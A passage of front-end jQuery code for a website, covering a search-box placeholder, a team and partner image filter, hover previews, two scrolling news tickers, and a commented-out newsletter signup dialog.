	var show_menu = false,
		t = null;
	
	function checkLength(o,n,min,max) {
		if ( o.val().length > max || o.val().length < min ) {
			o.addClass('ui-state-error');
			return false;
		} else {
			return true;
		}
	}

	function checkRegexp(o,regexp,n) {
		if ( !( regexp.test( o.val() ) ) ) {
			o.addClass('ui-state-error');
			updateTips(n);
			return false;
		} else {
			return true;
		}
	}
	
	/*$('#header_wrapper').hoverIntent(function() {
		$('.container_center').find('#menu_bar').slideDown("fast");
		show_menu = true;
		t = setTimeout(function() {
			if (!show_menu) {
				$('#menu_bar').slideUp("fast");
			}
		}, 800);
	}, function() {
		if (!show_menu) {
			$('.container_center').find('#menu_bar').slideUp("fast");
		}
	});
	$('#menu_bar').hover(function() {
		show_menu = true;
	}, function() {
		show_menu = false;
		$(this).slideUp("fast");
		clearTimeout(t);
	});
	$('.text_inputs').click(function() {
		if ($(this).val() === "Search") {
			$(this).val("");
		}
	});*/
	
	/**
	 * Newsletter
	 */
	/*
	var email = $("#email"),
		name = $("#name");

	$("#dialog").dialog({
		bgiframe: true,
		autoOpen: false,
		height: 240,
		modal: true,
		buttons: {
			'Save': function() {
				var bValid = true,
					self = this;
				email.removeClass('ui-state-error');
				bValid = bValid && checkLength(email,"email",6,80);
				bValid = bValid && checkRegexp(email,/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/i,"eg. ui@jquery.com");
				
				if (bValid) {
					$.ajax({
						type: "POST",
						url: "/staging/drupal/newsletter/",
						data: "email=" + email.val() + "&name=" + name.val(),
						success: function(msg){
						  $(self).find('#dialog_success_msg').css("visibility", "visible");
						  setTimeout(function() {
							$(self).find('#dialog_success_msg').css("visibility", "hidden");
							$(self).dialog('close');
						  }, 1000);
						}
					});
				}
			},
			Cancel: function() {
				$(this).dialog('close');
			}
		},
		close: function() {
			email.val('').removeClass('ui-state-error');
		}
	});
	
	// Set newsletter onclick
	$('a.newsletter').click(function() {
		$('#menu_bar').slideUp("fast");
		$('#dialog').dialog('open');
	});*/
});
	
function getStyle(el,styleProp) {
	var x = document.getElementById(el);
	if (x.currentStyle)
		var y = x.currentStyle[styleProp];
	else if (window.getComputedStyle)
		var y = document.defaultView.getComputedStyle(x,null).getPropertyValue(styleProp);
	return y;
};

/*
 Text box default text clear
*/
function autoFill(id, v){
	  $(id).attr({
		  value: v
	  }).focus(function(){
		  if($(this).val()==v){
			$(this).val("").css({
				color: "#333"
			});
		  }
	  }).blur(function(){
	  if($(this).val()==""){
		$(this).val(v).css({"color" : "#808080" });
	  }
  });
}
$(document).ready(function(){
						
    autoFill($(".text_inputs"), "Search"); //auto fill search field
	
	// menu filtering
	$(".members_filter").hover(
		function() {
			var cat = $(this).attr("rel");
			window.location.hash = "#" + cat;
			if (cat=="partner") {
				$("#partner_link").fadeTo(500, 1);
				$("#team_member_link").fadeTo(500, 0.3);
			} else {
				$("#team_member_link").fadeTo(500, 1);
				$("#partner_link").fadeTo(500, 0.3);
			}
			$(".team_image").not("."+cat).fadeTo(500, 0.3);
			$(".team_image").filter("."+cat).fadeTo(500, 1);
			return false;
		}, function () {
			$("#team_member_link").fadeTo(500, 1);
			$("#partner_link").fadeTo(500, 1);
			$(".team_image").fadeTo(500, 1);
		  }
	);
  
    $('.archive-title').hover(function(){
        $('.archive-dropdown').fadeIn();
        },function(){
            $('.archive-dropdown').fadeOut();
    });
	
	// menu filtering
	/*$(".members_filter").hover(
		function() {
			var cat = $(this).attr("rel");
			window.location.hash = "#" + cat;
			if (cat=="partner") {
				$("#partner_link").fadeTo(500, 1);
				$("#team_member_link").fadeTo(500, 0.3);
			} else {
				$("#team_member_link").fadeTo(500, 1);
				$("#partner_link").fadeTo(500, 0.3);
			}
			$(".team_image").not("."+cat).children('img').fadeTo(500, 0.3);
			$(".team_image").filter("."+cat).children('img').fadeTo(500, 1);
			return false;
		}, function () {
			$("#team_member_link").fadeTo(500, 1);
			$("#partner_link").fadeTo(500, 1);
			$(".team_image").children('img').fadeTo(500, 1);
		  }
	);*/
	
  var b = 4000;
		initTicker = function (a) {
			stopTicker(a);
			a.items = $("li", a);
			a.items.not(":eq(0)").hide().end();
			a.currentitem = 0;
			startTicker(a)
		};
		startTicker = function (a) {
			a.tickfn = setInterval(function () {
				doTick(a)
			},
			b)
		};
		stopTicker = function (a) {
			clearInterval(a.tickfn)
		};
		pauseTicker = function (a) {
			a.pause = true
		};
		resumeTicker = function (a) {
			a.pause = false
		};
		doTick = function (a) {
			if (a.pause) return;
			a.pause = true;
			$(a.items[a.currentitem]).fadeOut("slow", function () {
				$(this).hide();
				a.currentitem = ++a.currentitem % (a.items.size());
				$(a.items[a.currentitem]).fadeIn("slow", function () {
					a.pause = false
				})
			})
		};
		$("ul#ticker02").each(function () {
			if (this.nodeName.toLowerCase() != "ul") return;
			initTicker(this)
		}).addClass("newsticker").hover(function () {
			pauseTicker(this)
		},
		function () {
			resumeTicker(this)
		});
		//return this;
  
  
	// run on window.load so we can capture any incoming hashes
	/*$(window).load(function(){
		if ( window.location.hash ) {
			// get rid of the '#' from the hash
			var cat = window.location.hash.replace('#', '');
			if (cat=="partner") {
				$("#partner_link").fadeTo(500, 1);
				$("#team_member_link").fadeTo(500, 0.3);
			} else {
				$("#team_member_link").fadeTo(500, 1);
				$("#partner_link").fadeTo(500, 0.3);
			}
			switch (cat) {
				// if the hash matches the following words
				case 'partner' : case 'team_member' :  
			  		$(".team_image").not("."+cat).fadeTo(500, 0.3);
					$(".team_image").filter("."+cat).fadeTo(500, 1);
			  		break;
			}
		} else {
			cat = "team_member";
			$("#team_member_link").fadeTo(500, 1);
			$("#partner_link").fadeTo(500, 0.3);
			$(".team_image").not("."+cat).fadeTo(500, 0.3);
			$(".team_image").filter("."+cat).fadeTo(500, 1);
		}
	});*/
	

	
	/* images preview team members popup */
	$(".onhover_preview").hover(
	  function () {
		var image = $(this).attr("rel");
		$("#image_preview").html('<img src="'+ image +'" alt="" />');
	  } 
	);
  
  $(".onhover_preview1").hover(
	  function () {
		var image = $(this).attr("rel");
		$("#partner_image").html('<img src="'+ image +'" alt="" />');
	  } 
	);
  
	return $("ul#ticker01").each(function(){
				var $strip = jQuery(this);
				$strip.addClass("newsticker")
				var stripWidth = 1;
				$strip.find("li").each(function(i){
            stripWidth += jQuery(this, i).outerWidth(true); // thanks to Michael Haszprunar and Fabien Volpi
				});
				var $mask = $strip.wrap("<div class='mask'></div>");
				var $tickercontainer = $strip.parent().wrap("<div class='tickercontainer'></div>");								
				var containerWidth = $strip.parent().parent().width();	//a.k.a. 'mask' width 	
				$strip.width(stripWidth);			
				var totalTravel = stripWidth+containerWidth;
				var defTiming = totalTravel/0.07;	// thanks to Scott Waye		
				function scrollnews(spazio, tempo){
            $strip.animate({left: '-='+ spazio}, tempo, "linear", function(){$strip.css("left", containerWidth); scrollnews(totalTravel, defTiming);});
				}
				scrollnews(totalTravel, defTiming);				
				$strip.hover(function(){
            jQuery(this).stop();
				},
				function(){
            var offset = jQuery(this).offset();
            var residualSpace = offset.left + stripWidth;
            var residualTime = residualSpace/0.07;
            scrollnews(residualSpace, residualTime);
				});			
		});	
		

    
	
});;

